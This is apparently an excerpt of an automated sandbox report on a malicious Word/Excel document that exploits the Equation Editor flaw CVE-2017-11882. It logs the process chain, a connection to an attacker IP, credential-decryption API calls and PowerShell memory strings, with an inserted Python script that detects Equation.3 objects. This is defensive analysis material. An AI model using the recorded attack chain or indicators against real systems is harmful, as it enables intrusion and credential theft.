            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C11E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,19_2_000C11E1
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,19_2_000C123B
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C1FCE CryptUnprotectData,RtlMoveMemory,19_2_000C1FCE
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 21_2_000826AC lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,21_2_000826AC
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 22_2_0008178C lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,22_2_0008178C
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 22_2_0008118D CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,22_2_0008118D
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_00082404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,24_2_00082404
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_0008245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,24_2_0008245E
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 24_2_0008263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,24_2_0008263E
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 26_2_00082799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,26_2_00082799
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 26_2_000825A4 CryptBinaryToStringA,CryptBinaryToStringA,26_2_000825A4

            Exploits

            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 23.94.148.16 Port: 80
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe
            Source: ~WRF{21E9ADCA-4DF6-4ACD-96FE-092206FC804F}.tmp.4.dr | Stream path '_1786603024/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: ~WRF{21E9ADCA-4DF6-4ACD-96FE-092206FC804F}.tmp.4.dr | Stream path '_1786603027/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: unknown | HTTPS traffic detected: 208.64.171.230:443 -> 192.168.2.22:49164 version: TLS 1.0
            Source: unknown | HTTPS traffic detected: 208.64.171.230:443 -> 192.168.2.22:49165 version: TLS 1.0
            Source: unknown | HTTPS traffic detected: 208.64.171.230:443 -> 192.168.2.22:49166 version: TLS 1.0
            Source: unknown | HTTPS traffic detected: 207.241.232.154:443 -> 192.168.2.22:49171 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: unknown | HTTPS traffic detected: 208.64.171.230:443 -> 192.168.2.22:49161 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 208.64.171.230:443 -> 192.168.2.22:49163 version: TLS 1.2
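            The Exploits entries show the document side of the chain: Word starts EQNEDT32.EXE with -Embedding, the dropped ~WRF{...}.tmp carries CompObj streams naming Microsoft Equation 3.0, Avira labels it EXP/CVE-2017-11882.Gen, and the two .doc files are flagged as malformed RTF. The Python below is an added example, not Joe Sandbox code: it performs the static check an analyst would run on such a file before detonation, looking for the Equation.3 class id and user-type strings in the raw bytes and, for RTF, hex-decoding the \objdata blobs first, because the OLE1 object inside RTF is stored as hex and a plain string search never sees it. The Equation.3 CLSID {0002CE02-0000-0000-C000-000000000046} is a known constant; the sample documents are constructed.

```python
"""Static scan of a document for an embedded Equation Editor (Equation.3) object,
the CVE-2017-11882 carrier this report shows. Added example; sample files are
constructed and intentionally minimal."""
import re

# Equation.3 class id as stored little-endian in an OLE compound file.
EQUATION3_CLSID_LE = bytes.fromhex("02ce020000000000c000000000000046")
TEXT_MARKERS = (b"Microsoft Equation 3.0", b"Equation.3")
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")


def rtf_objdata_blobs(data):
    """Hex-decode every \\objdata run in an RTF; each one is an OLE1 object stream."""
    blobs = []
    for run in OBJDATA_RE.findall(data):
        clean = re.sub(rb"\s+", b"", run)
        clean = clean[: len(clean) & ~1]          # drop a dangling nibble
        blobs.append(bytes.fromhex(clean.decode("ascii")))
    return blobs


def equation_indicators(data):
    """Indicator names found in the raw bytes and, for RTF input, inside the
    hex-encoded object data. Returns a set like {'objdata:Equation.3'}."""
    views = [("raw", data)]
    if data.startswith(b"{\\rt"):
        views += [("objdata", blob) for blob in rtf_objdata_blobs(data)]
    found = set()
    for where, buf in views:
        if EQUATION3_CLSID_LE in buf:
            found.add(where + ":clsid")
        for marker in TEXT_MARKERS:
            if marker in buf:
                found.add(where + ":" + marker.decode())
    return found


def build_ole_sample():
    """Constructed: CFB signature, a \\x01CompObj stream name, the class id and
    the user-type string this report shows, padded with zeros."""
    return (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 64
            + "\x01CompObj".encode("utf-16-le") + b"\x00" * 32
            + EQUATION3_CLSID_LE + b"\x00" * 16 + b"Microsoft Equation 3.0\x00")


def build_rtf_sample(with_objclass):
    """Constructed RTF embedding an OLE1 object whose class name is Equation.3;
    with_objclass=False leaves only the hex blob as evidence."""
    ole1 = (bytes.fromhex("01050000")                       # OLEVersion
            + bytes.fromhex("02000000")                     # FormatID 2 = embedded object
            + bytes.fromhex("0b000000") + b"Equation.3\x00")  # length-prefixed class name
    objclass = b"{\\*\\objclass Equation.3}" if with_objclass else b""
    return (b"{\\rtf1{\\object\\objemb" + objclass
            + b"{\\*\\objdata " + ole1.hex().encode("ascii") + b"}}}")


if __name__ == "__main__":
    for label, doc in (("ole", build_ole_sample()),
                       ("rtf+objclass", build_rtf_sample(True)),
                       ("rtf hex only", build_rtf_sample(False))):
        print(label, sorted(equation_indicators(doc)))
```

            A hit is a triage signal, not a verdict: Equation objects exist in legitimate old documents, so pair it with the process tree (EQNEDT32.EXE spawning a script host or opening a socket, as above). The raw-byte scan of a compound file can miss a string that straddles two non-adjacent sectors; for production use, walk the streams with a CFB parser such as olefile.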
            Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: RegAsm.pdb source: dagifhd, 00000011.00000000.500871936.0000000001082000.00000020.00000001.01000000.00000008.sdmp, dagifhd.15.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: RegAsm.pdb4 source: dagifhd, 00000011.00000000.500871936.0000000001082000.00000020.00000001.01000000.00000008.sdmp, dagifhd.15.dr
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000D.00000002.456409389.0000000006000000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.454453172.0000000003349000.00000004.00000800.00020000.00000000.sdmp
